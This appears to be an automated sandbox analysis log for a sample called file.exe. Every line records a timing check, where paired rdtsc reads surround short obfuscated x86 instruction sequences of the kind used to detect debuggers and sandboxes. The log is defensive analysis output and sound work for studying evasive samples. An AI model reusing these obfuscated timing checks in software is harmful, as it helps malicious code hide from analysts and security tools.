Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9441AC second address: 9441BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 944B8B second address: 944BC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 xchg eax, ebx 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007FE83906A388h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 mov si, AE41h 0x00000026 nop 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a jbe 00007FE83906A386h 0x00000030 je 00007FE83906A386h 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 944F72 second address: 944F7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9450A7 second address: 9450F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FE83906A393h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007FE83906A388h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 xchg eax, ebx 0x0000002a pushad 0x0000002b push ebx 0x0000002c pushad 0x0000002d popad 0x0000002e pop ebx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9450F0 second address: 945102 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jo 00007FE839054480h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 945FDF second address: 945FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 945E7F second address: 945E84 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 945FE3 second address: 945FF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A391h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94681D second address: 946822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 946822 second address: 946839 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE83906A393h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 948567 second address: 94856D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94856D second address: 948571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 949AD2 second address: 949AD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 949AD6 second address: 949ADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 949ADC second address: 949AE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FE839054476h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 949AE6 second address: 949AEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9038FF second address: 903907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94F6EA second address: 94F703 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FE83906A38Ah 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 950778 second address: 95077C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95077C second address: 9507FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FE83906A388h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 jmp 00007FE83906A397h 0x00000029 push 00000000h 0x0000002b xor edi, 457CEFCCh 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push esi 0x00000036 call 00007FE83906A388h 0x0000003b pop esi 0x0000003c mov dword ptr [esp+04h], esi 0x00000040 add dword ptr [esp+04h], 00000019h 0x00000048 inc esi 0x00000049 push esi 0x0000004a ret 0x0000004b pop esi 0x0000004c ret 0x0000004d mov ebx, dword ptr [ebp+122D2CC3h] 0x00000053 xchg eax, esi 0x00000054 pushad 0x00000055 jl 00007FE83906A388h 0x0000005b pushad 0x0000005c popad 0x0000005d jl 00007FE83906A38Ch 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94F8B2 second address: 94F8B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94F8B8 second address: 94F8C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FE83906A386h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95186F second address: 951874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 952921 second address: 952928 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 952928 second address: 952939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007FE839054476h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 951A1D second address: 951A21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 951A21 second address: 951A2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FE839054476h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 954B13 second address: 954B44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A399h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE83906A392h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 953C24 second address: 953C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 954C5D second address: 954C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 954C63 second address: 954C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 954C68 second address: 954C72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FE83906A386h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 954C72 second address: 954C76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 955CFA second address: 955D1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A397h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 957DF3 second address: 957DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 958E01 second address: 958E0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FE83906A38Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 956E75 second address: 956E7F instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE839054476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 956E7F second address: 956E84 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95804B second address: 958052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 956E84 second address: 956E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 958052 second address: 958068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE839054482h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 956E91 second address: 956E95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95DA09 second address: 95DA13 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE839054476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95DA13 second address: 95DA1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FE83906A386h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95DA1D second address: 95DA94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE839054480h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007FE839054478h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push edx 0x0000002d call 00007FE839054478h 0x00000032 pop edx 0x00000033 mov dword ptr [esp+04h], edx 0x00000037 add dword ptr [esp+04h], 00000019h 0x0000003f inc edx 0x00000040 push edx 0x00000041 ret 0x00000042 pop edx 0x00000043 ret 0x00000044 mov ebx, eax 0x00000046 add edi, dword ptr [ebp+122D2C03h] 0x0000004c push 00000000h 0x0000004e mov bl, 64h 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jng 00007FE839054478h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95DBE9 second address: 95DBEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 966A44 second address: 966A49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 906E21 second address: 906E25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 906E25 second address: 906E29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 906E29 second address: 906E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE83906A392h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c je 00007FE83906A386h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 906E4A second address: 906E50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 970887 second address: 97088C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 970E0B second address: 970E11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 970E11 second address: 970E15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 971293 second address: 971299 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9713EF second address: 9713FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A38Ah 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9716D7 second address: 9716E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007FE839054476h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9716E7 second address: 9716ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9716ED second address: 97170B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FE839054476h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE83905447Ah 0x00000013 js 00007FE839054476h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97170B second address: 97170F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97170F second address: 97171B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97184F second address: 971855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 971855 second address: 97185B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97185B second address: 971860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97713B second address: 977143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 977143 second address: 977148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 901E13 second address: 901E18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 901E18 second address: 901E2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A38Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 901E2D second address: 901E37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FE839054476h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 942A35 second address: 942A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 942A3C second address: 942A42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 942B6B second address: 942B80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 je 00007FE83906A392h 0x0000000d jbe 00007FE83906A38Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 943059 second address: 9430B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FE839054482h 0x0000000a popad 0x0000000b add dword ptr [esp], 1722A8A6h 0x00000012 mov ecx, 1B4C98CCh 0x00000017 call 00007FE839054479h 0x0000001c jmp 00007FE839054486h 0x00000021 push eax 0x00000022 ja 00007FE83905447Eh 0x00000028 jnp 00007FE839054478h 0x0000002e pushad 0x0000002f popad 0x00000030 mov eax, dword ptr [esp+04h] 0x00000034 push eax 0x00000035 push edx 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9430B4 second address: 9430B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9430B9 second address: 9430DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE839054482h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jnc 00007FE839054490h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9431EE second address: 943207 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE83906A395h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 943207 second address: 94320B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94320B second address: 94323B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b call 00007FE83906A399h 0x00000010 xor dword ptr [ebp+122D3337h], edi 0x00000016 pop edi 0x00000017 nop 0x00000018 pushad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94323B second address: 943245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 943245 second address: 943250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 943250 second address: 943256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9434D8 second address: 9434E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 jo 00007FE83906A394h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9434E8 second address: 9434EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 943880 second address: 9438FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A399h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007FE83906A388h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 mov edi, dword ptr [ebp+122D1DF1h] 0x0000002d push 0000001Eh 0x0000002f jmp 00007FE83906A399h 0x00000034 nop 0x00000035 jnc 00007FE83906A38Eh 0x0000003b push eax 0x0000003c push edi 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9438FC second address: 943900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 943900 second address: 943904 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 943CD5 second address: 943CDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FE839054476h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 943CDF second address: 943D09 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE83906A386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d lea eax, dword ptr [ebp+124747D3h] 0x00000013 or ch, FFFFFFB5h 0x00000016 mov edi, dword ptr [ebp+122D2C03h] 0x0000001c nop 0x0000001d pushad 0x0000001e jc 00007FE83906A388h 0x00000024 push esi 0x00000025 pop esi 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97687F second address: 976885 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 976885 second address: 97689C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 js 00007FE83906A386h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007FE83906A386h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97689C second address: 9768A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9769E3 second address: 9769E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 976B57 second address: 976B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE83905447Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 976B6A second address: 976B81 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE83906A38Eh 0x00000008 jns 00007FE83906A386h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
